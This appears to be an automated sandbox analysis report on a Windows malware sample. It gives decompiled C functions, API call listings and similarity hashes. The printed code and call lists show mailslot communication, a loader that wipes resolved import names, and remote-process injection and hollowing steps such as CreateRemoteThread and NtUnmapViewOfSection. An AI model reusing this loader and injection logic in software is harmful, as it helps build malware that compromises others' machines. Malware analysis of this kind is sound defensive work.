  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
